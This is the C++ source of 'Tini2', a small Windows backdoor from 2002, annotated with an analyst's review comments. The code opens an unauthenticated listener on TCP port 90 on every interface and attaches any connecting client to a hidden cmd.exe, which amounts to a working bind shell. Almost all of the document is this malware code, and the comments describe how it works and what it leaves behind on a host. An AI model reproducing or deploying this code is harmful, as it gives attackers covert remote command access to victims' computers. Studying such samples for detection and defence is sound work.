tini2后门代码
////////////////////////////////////////////////////////////////////////////////
//
// Telnet Server.
//
// File      : Tini2.cpp
// Create at : 2002.3.28
// Create by : dancefire , refdom
// Email     : dangcefire@263.net , refdom@263.net
//
// If you modify the code, or add more functions, please email me a copy.
//
////////////////////////////////////////////////////////////////////////////////
#include <stdio.h> #include <winsock2.h> #pragma comment(lib, "ws2_32.lib") #pragma comment(lib, "kernel32.lib")
// TCP port that main() binds the listening socket to.
#define PORT 90

// Listening socket and the most recently accepted client socket. Both are
// file-scope globals read and written by main() and the two relay threads
// with no locking.
SOCKET ServerSocket = INVALID_SOCKET;
SOCKET ClientSocket = INVALID_SOCKET;
// Ends of two anonymous pipes:
//   hReadPipe  / hWriteFile : created in ThreadFuncA (socket -> child stdin)
//   hReadFile  / hWritePipe : created in ThreadFuncB (child stdout/stderr -> socket)
HANDLE hReadPipe, hWritePipe, hWriteFile, hReadFile;
// Readiness flags: ThreadFuncA sets varA = 1 and ThreadFuncB sets varB = 1
// after its CreatePipe call; main() polls them before spawning the child.
u_char varA,varB;
// Socket-to-pipe relay thread.
//
// Creates the pipe whose read end (hReadPipe) main() later assigns to the
// child's standard input, then loops forever copying whatever arrives on
// ClientSocket into the pipe's write end (hWriteFile). Nothing received is
// authenticated or filtered before it is written to the pipe.
//
// lpParam is unused. The loop never exits, so the final return is unreachable.
DWORD WINAPI ThreadFuncA( LPVOID lpParam )
{
    SECURITY_ATTRIBUTES pipeattr;
    DWORD nByteToWrite, nByteWritten;
    char recv_buff[1024];

    // bInheritHandle = TRUE makes both pipe handles inheritable, which is what
    // lets the process created in main() (bInheritHandles TRUE) use them.
    pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
    pipeattr.lpSecurityDescriptor = NULL;
    pipeattr.bInheritHandle = TRUE;
    // Return value is not checked.
    CreatePipe(&hReadPipe, &hWriteFile, &pipeattr, 0);

    // Signal main() that this thread's pipe exists.
    varA = 1;
    while(true)
    {
        Sleep(250);
        // NOTE(review): recv() returns int, but the result is stored in a DWORD
        // and passed to WriteFile unchecked. While ClientSocket is still
        // INVALID_SOCKET (before the first accept), or on any socket error, the
        // SOCKET_ERROR return becomes a very large unsigned length for a
        // 1024-byte buffer. A return of 0 (peer closed) is not handled either.
        nByteToWrite = recv(ClientSocket, recv_buff, 1024, 0);
        WriteFile(hWriteFile, recv_buff, nByteToWrite, &nByteWritten, NULL);
    }
    return 0;
}
// Pipe-to-socket relay thread.
//
// Creates the pipe whose write end (hWritePipe) main() later assigns to the
// child's standard output and standard error, then loops forever reading from
// the read end (hReadFile) and sending the bytes to ClientSocket. The data is
// sent as-is over the plain TCP socket; no encryption is applied here.
//
// lpParam is unused. The loop never exits, so the final return is unreachable.
DWORD WINAPI ThreadFuncB( LPVOID lpParam )
{
    SECURITY_ATTRIBUTES pipeattr;
    DWORD len;
    char send_buff[25000];

    // Inheritable handles, as in ThreadFuncA, so the child process can use them.
    pipeattr.nLength = sizeof(SECURITY_ATTRIBUTES);
    pipeattr.lpSecurityDescriptor = NULL;
    pipeattr.bInheritHandle = TRUE;

    // Return value is not checked.
    CreatePipe(&hReadFile, &hWritePipe, &pipeattr, 0);

    // Signal main() that this thread's pipe exists.
    varB = 1;
    while (true)
    {
        // NOTE(review): neither ReadFile nor send is checked. If ReadFile fails,
        // len may be stale or unset when it is used as the send length.
        ReadFile(hReadFile, send_buff, 25000, &len, NULL);

        send(ClientSocket, send_buff, len, 0);
    }
    return 0;
}
// Entry point. Analyst summary of what the visible code does:
//   1. Opens a TCP listener on PORT (90) bound to INADDR_ANY, i.e. all interfaces.
//   2. Starts the two relay threads, which create the stdin and stdout/stderr pipes.
//   3. Launches the system command interpreter once, with a hidden window and
//      its standard handles redirected to those pipes.
//   4. Accepts connections forever. Each accepted socket becomes ClientSocket,
//      which the relay threads read from and write to.
// No step authenticates the peer, so any host that can reach the port is
// attached to the interpreter's input and output.
// Host-side artefacts that follow from the code: a listening TCP socket on
// port 90, and a cmd.exe / command.exe child started with SW_HIDE and
// inherited pipe handles as stdio.
void main(void)
{
    WSADATA WSAData;
    struct sockaddr_in RemoteAddr;
    int nRetCode;   // declared but not used in the visible code
    DWORD dwThreadIdA,dwThreadIdB,dwThreadParam=0;
    OSVERSIONINFO osvi;
    PROCESS_INFORMATION processinfo;
    STARTUPINFO startinfo;

    // Winsock 2.2 is requested. The results of WSAStartup, socket, bind and
    // listen are all ignored.
    WSAStartup(MAKEWORD(2,2),&WSAData);
    ServerSocket = socket(AF_INET, SOCK_STREAM, IPPROTO_TCP);
    RemoteAddr.sin_family = AF_INET;
    RemoteAddr.sin_port = htons(PORT);
    // INADDR_ANY: the listener is reachable on every local interface.
    RemoteAddr.sin_addr.S_un.S_addr = INADDR_ANY;

    bind(ServerSocket,(LPSOCKADDR)&RemoteAddr,sizeof(RemoteAddr));
    listen(ServerSocket, 5);

    varA = 0;
    varB = 0;
    CreateThread(NULL, 0, ThreadFuncA, NULL, 0, &dwThreadIdA);
    CreateThread(NULL, 0, ThreadFuncB, NULL, 0, &dwThreadIdB);

    // NOTE(review): the loop ends as soon as EITHER flag is non-zero, not both,
    // so one of the pipes may not exist yet when its handle is copied below.
    do{
        Sleep(250);
    }while((varA || varB) == 0);

    // Start from this process's own startup info, then override the fields
    // that matter: redirected std handles and a hidden window.
    GetStartupInfo(&startinfo);
    startinfo.dwFlags = STARTF_USESHOWWINDOW|STARTF_USESTDHANDLES;
    startinfo.hStdInput = hReadPipe;     // child stdin  <- bytes relayed by ThreadFuncA
    startinfo.hStdError = hWritePipe;    // child stderr -> bytes relayed by ThreadFuncB
    startinfo.hStdOutput = hWritePipe;   // child stdout -> same pipe as stderr
    startinfo.wShowWindow = SW_HIDE;     // no visible console window for the child

    osvi.dwOSVersionInfoSize = sizeof(OSVERSIONINFO);

    GetVersionEx(&osvi);
    // NOTE(review): szAPP holds 256 chars, but the size passed is MAX_PATH+1
    // (MAX_PATH is 260 in the Windows SDK), and strcat below appends to it with
    // no bounds check.
    char szAPP[256];
    GetSystemDirectory(szAPP,MAX_PATH+1);

    // dwPlatformId 2 is VER_PLATFORM_WIN32_NT in the Windows SDK; other
    // platforms take the command.exe branch.
    // NOTE(review): "//cmd.exe", "//command.exe" and "/n" are reproduced as
    // they appear on the page. They look like backslash escapes altered during
    // publishing, but that is not verifiable from here.
    if(osvi.dwPlatformId == 2)
    {
        strcat(szAPP,"//cmd.exe");
        // The fifth argument (bInheritHandles) is TRUE, so the child receives
        // the inheritable pipe handles set in startinfo.
        if (CreateProcess(szAPP, NULL, NULL, NULL, TRUE, 0, NULL, NULL, &startinfo, &processinfo) == 0)
        {
            printf ("CreateProcess Error!/n");
            return;
        }
    }
    else
    {
        strcat(szAPP,"//command.exe");
        // Same launch, but the path is passed as the command line, and the
        // result is not checked.
        CreateProcess(NULL, szAPP, 0, 0, true, 0, 0, 0, &startinfo, &processinfo);
    }

    // Accept loop. Every new connection overwrites ClientSocket, and the
    // previous socket is never closed in the visible code. The single child
    // process created above is shared by whichever connection is current.
    while (true)
    {
        ClientSocket = accept(ServerSocket, NULL, NULL);
        Sleep(250);
    }
}